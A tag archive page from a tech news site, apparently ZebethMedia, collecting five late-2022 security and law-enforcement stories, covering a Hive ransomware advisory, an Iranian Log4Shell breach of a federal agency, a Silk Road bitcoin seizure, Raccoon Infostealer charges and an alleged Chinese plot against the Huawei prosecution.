us government

Hive ransomware actors have extorted over $100M from victims, says FBI • ZebethMedia

By zebethcontrolPosted on November 18, 2022Posted in hive, ransomware, Security, us governmentNo Comments

The U.S. government has warned of ongoing malicious activity by the notorious Hive ransomware gang, which has extorted more than $100 million from its growing list of victims. A joint advisory released by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency, and the Department of Health and Human Services on Thursday revealed that the Hive ransomware gang has received upwards of $100 million in ransom payments from over 1,300 victims since the gang was first observed in June 2021. This list of victims includes organizations from a wide range of industries and critical infrastructure sectors such as government facilities, communications, and information technology, with a focus on specifically healthcare and public health entities. Hive, which operates a ransomware-as-a-service (RaaS) model, claimed the Illinois-based Memorial Health System as its first healthcare victim in August 2021. This cyberattack forced the health system to divert care for emergency patients and cancel urgent care surgeries and radiology exams. The ransomware gang also released sensitive health information of about 216,000 patients. Then, in June 2022, the gang compromised Costa Rica’s public health service before targeting New York-based emergency response and ambulance service provider Empress EMS the following month. Over 320,000 individuals had information stolen, including names, dates of services, insurance information, and Social Security numbers. Just last month, Hive also added Lake Charles Memorial Health System, a hospital system in Southwest Louisiana, to its dark web leak site, where it posted hundreds of gigabytes of data, including patient and employee information. Hive also targeted Tata Power, a top power generation company in India, in October. The joint FBI-CISA-HHS advisory warns that Hive typically gains access to victim networks by using stolen single-factor credentials to access organization remote desktop systems, virtual private networks, and other internet-facing systems. But CISA also warns that the ransomware group also skirts some multi-factor authentication systems by exploiting unpatched vulnerabilities. “In some cases, Hive actors have bypassed multi-factor authentication and gained access to FortiOS servers by exploiting CVE-2020-12812,” the advisory says. “This vulnerability enables a malicious cyber-actor to log in without a prompt for the user’s second authentication factor (FortiToken) when the actor changes the case of the username.” The advisory also warns that Hive actors have been observed reinfecting victims that restored their environments without paying a ransom, either with Hive or another ransomware variant. Microsoft’s Threat Intelligence Center (MSTIC) researchers warned earlier this year that Hive had upgraded its malware by migrating its code from Go to the Rust programming language, enabling it to use a more complex encryption method for its ransomware as a service payload. The U.S. government shared Hive indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) discovered by the FBI to help defenders detect malicious activity associated with Hive affiliates and reduce or eliminate the impact of such incidents.

Iran-backed hackers breached a US federal agency that failed to patch year-old bug • ZebethMedia

By zebethcontrolPosted on November 16, 2022Posted in CISA, iran, Log4j, Security, us governmentNo Comments

The U.S. government’s cybersecurity agency says hackers backed by the Iranian government compromised a federal agency that failed to patch against Log4Shell, a vulnerability fixed almost a year ago. In an alert published Thursday, the Cybersecurity and Infrastructure Security Agency said that a federal civilian executive branch organization (FCEB) was breached by Iranian government hackers earlier in February. CISA did not name the breached FCEB agency, a list that includes the likes of the Department of Homeland Security, the Department of the Treasury, and the Federal Trade Commission, and CISA spokesperson Michael Feldman declined to comment when reached by ZebethMedia. CISA said it first observed the suspected activity on the unnamed federal agency’s network months later in April while conducting retrospective analysis using Einstein, a government-run intrusion detection system used to protect federal civilian agency networks. The agency found that the hackers had exploited Log4Shell, a critical zero-day vulnerability in the ubiquitous open-source logging software Log4j, in an unpatched VMware Horizon server to gain initial access into the organization’s network with administrator and system-level access. This compromise happened even though CISA had ordered all federal civilian agencies to patch their systems affected by the Log4Shell vulnerability by December 23. Once inside the organizations’ network, CISA observed the threat actors installed XMRig, open-source crypto mining software that is commonly abused by hackers for mining virtual currency on compromised computers. The attackers also installed Mimikatz, an open-source credential stealer, to harvest passwords and to create a new domain administrator account. Using this newly created account, the hackers disabled Windows Defender and implanted Ngrok reverse proxies on several hosts in order to maintain their access in the future. The attackers also changed the password for the local administrator account on several hosts as a backup should the rogue domain administrator account get detected and terminated. It’s not clear for what reason the hackers targeted the U.S. federal agency. Broad access to an organization’s network can be used for both espionage as well as launching destructive attacks. CISA, which has not attributed the breach to a particular advanced persistent threat (APT) group, shared indicators of compromise (IOCs) to help network defenders detect and protect against similar compromises. CISA also said that organizations that haven’t yet patched VMware systems against Log4Shell should assume that they’ve already been breached and advises them to start hunting for malicious activity within their networks. The agency also urges organizations to keep all software up-to-date, implement , and prevent users from using known compromised passwords.

US DOJ announces seizure of $3.36B in cryptocurrency • ZebethMedia

By zebethcontrolPosted on November 7, 2022Posted in Bitcoin, Crypto, cryptocurrency, silk road, us governmentNo Comments

The U.S. Department of Justice on Monday announced that law enforcement seized $3.36 billion of bitcoin from a man who “unlawfully obtained” over 50,000 bitcoin from darkweb market Silk Road over a decade ago. The U.S. Attorney for the Southern District of New York said that James Zhong of Gainesville, Georgia, pleaded guilty on November 4 to committing wire fraud in September 2012. The charge carries a maximum sentence of 20 years in prison. The plea came almost a year after law enforcement seized 50,676.17851897 bitcoin, then valued at over $3.36 billion, from Zhong’s home, the statement said. Officials found the bitcoin in an underground floor safe and on a single-board computer that was hidden under blankets in a popcorn tin placed in a bathroom closet. Law enforcement also recovered $661,900 in cash, 25 Casascius coins of bitcoin (valued at about 174 bitcoin), an additional 11.116 bitcoin, and a handful of silver- and gold-colored bars. The whereabouts of this massive amount of bitcoin was a mystery for almost 10 years, U.S. Attorney Damian WIlliams said in the release. It was the largest cryptocurrency seizure in the history of the U.S. DOJ at the time, and today remains the department’s second-largest financial seizure, it stated. Silk Road was an online black market that was launched in 2011 by the then-anonymous “Dread Pirate Roberts” (later uncovered as Ross Ulbricht). It was notoriously known for money laundering activities and for buying and selling illegal drugs with bitcoin. In under two years, the Silk Road was shut down by the U.S. governmen,t and by 2015, Ulbricht was unanimously convicted by a jury and sentenced to life in prison. “This case shows that we won’t stop following the money, no matter how expertly hidden, even to a circuit board in the bottom of a popcorn tin,” Williams said.

US charges Ukrainian national over alleged role in Raccoon Infostealer malware operation • ZebethMedia

By zebethcontrolPosted on October 26, 2022Posted in cybersecurity, malware, Security, ukraine, us governmentNo Comments

U.S. officials have charged a Ukrainian national over his alleged role in the Raccoon Infostealer malware-as-a-service operation that infected millions of computers worldwide. Mark Sokolovsky — also known online as “raccoonstealer,” according to an indictment unsealed on Tuesday — is currently being held in the Netherlands while waiting to be extradited to the United States. The U.S. Department of Justice accused Sokolovsky of being one of the “key administrators” of the Raccoon Infostealer, a form of Windows malware that steals passwords, credit card numbers, saved username and password combinations, and granular location data. Raccoon Infostealer was leased to individuals for approximately $200 per month, the DOJ said, which was paid to the malware’s operators in cryptocurrency, typically Bitcoin. These individuals employed various tactics, such as COVID-19-themed phishing emails and malicious web pages, to install the malware onto the computers of unsuspecting victims. The malware then stole personal data from their computers, including login credentials, bank account details, cryptocurrency addresses, and other personal information, which were used to commit financial crimes or sold to others on cybercrime forums. An example of one of the phishing emails sent by the crime group. Image Credits: U.S. Justice Department. According to U.S. officials, the malware stole more than 50 million unique credentials and forms of identification from victims around the world since February 2019. These victims include a financial technology company based in Texas and an individual who had access to U.S. Army information systems, according to the unsealed indictment. Cybersecurity firm Group-IB said the malware may have been used to steal employee credentials during the recent Uber breach. But the DOJ said it “does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.” The Justice Department said it worked with European law enforcement to dismantle the IT infrastructure powering Raccoon Infostealer in March 2022, when Dutch authorities arrested Sokolovsky. According to one report, the malware operation claimed it was suspending its operations after one of its lead developers was allegedly killed during Russia’s invasion of Ukraine. A new version of Raccoon Infostealer was reportedly launched in June this year. The FBI also announced on Tuesday that it has created a website that allows anyone to check if their data is contained in the U.S. government’s archive of information stolen by Raccoon Infostealer. “This case highlights the importance of the international cooperation that the Department of Justice and our partners use to dismantle modern cyber threats,” said Deputy Attorney General Lisa O. Monaco. “As reflected in the number of potential victims and global breadth of this attack, cyber threats do not respect borders, which makes international cooperation all the more critical. I urge anyone who thinks they could be a victim to follow the FBI’s guidance on how to report your potential exposure.” Sokolovsky is charged with computer fraud, wire fraud, money laundering, and identity theft and faces up to 20 years in prison if found guilty. The DOJ said Sokolovsky is appealing a September 2022 decision by the Amsterdam District Court granting his extradition to the United States.

US charges two alleged Chinese spies over plot to obstruct Huawei prosecution • ZebethMedia

By zebethcontrolPosted on October 24, 2022Posted in China, Huawei, Security, us governmentNo Comments

The U.S. Department of Justice (DOJ) has unsealed charges against two alleged DPRC spies who are accused of attempting to obstruct a federal prosecution against Chinese telecommunications giant Huawei. In a criminal complaint dated October 20 and made public on Monday, the U.S. claims that two Chinese intelligence officers, Guochun He (known as “Dong He”) and Zheng Wang (known as “Zen Wang”), attempted to bribe a U.S. law-enforcement official to obtain what they believed was inside information about the U.S. criminal case against a “global telecommunications company based in China.” The complaint doesn’t name the company, but the details match up with the known prosecution of the company. Huawei did not respond to a request for comment. The complaint alleges that He and Wang “attempted to direct a person they believed they recruited as an asset” inside a U.S. government law enforcement agency “to obtain confidential information regarding potential new charges to be brought against [Huawei] for the purpose of obstructing justice.” The government alleges He and Wang first cultivated their relationship with the law enforcement employee, who is not named, in February 2017, but that person “subsequently began working as a double agent for the U.S. government.” The men are accused of attempting to extract confidential information about witnesses and trial evidence in the Huawei case and paid the double agent, referred to as “GE-1”, $61,000 in bitcoin, cash and jewelery for what they believed was insider information about the Justice Department’s pending prosecution of the China-based company. At one point in October 2021, the indictment alleges, the undercover agent passed a single-page document to one of the Chinese intelligence officers, classified as “SECRET”, that detailed U.S. plans to arrest two principals from Huawei living in China. They paid the undercover agent $41,000 just for that single page. “Far more than an effort to collect information or intelligence, the actions of the PRC intelligence officers charged in this case must be called out for what they are: an extraordinary intervention by agents of a foreign government to interfere with the integrity of the U.S. criminal justice system, compromise a U.S. government employee and obstruct the enforcement of U.S. law to benefit a PRC-based commercial enterprise,” said Assistant Attorney General for National Security Matthew G. Olsen. “The Department of Justice will not abide nation-state actors meddling in U.S. criminal process and investigations, and will not tolerate foreign interference with the fair administration of justice.” If convicted, He and Wang face up to 60 years and 20 years in prison, respectively. The case was one of three unsealed on Monday relating to alleged Chinese interference in the U.S. justice system. One in New Jersey charges three Chinese intelligence agents with conspiring to act in the U.S. as illegal agents on behalf of a foreign government, while another in the Eastern District of New York accuses several people working on behalf of the Chinese government of “engaging in a multi-year campaign of threats and harassment to force a U.S. resident to return to China,” Attorney General Merrick Garland said Monday.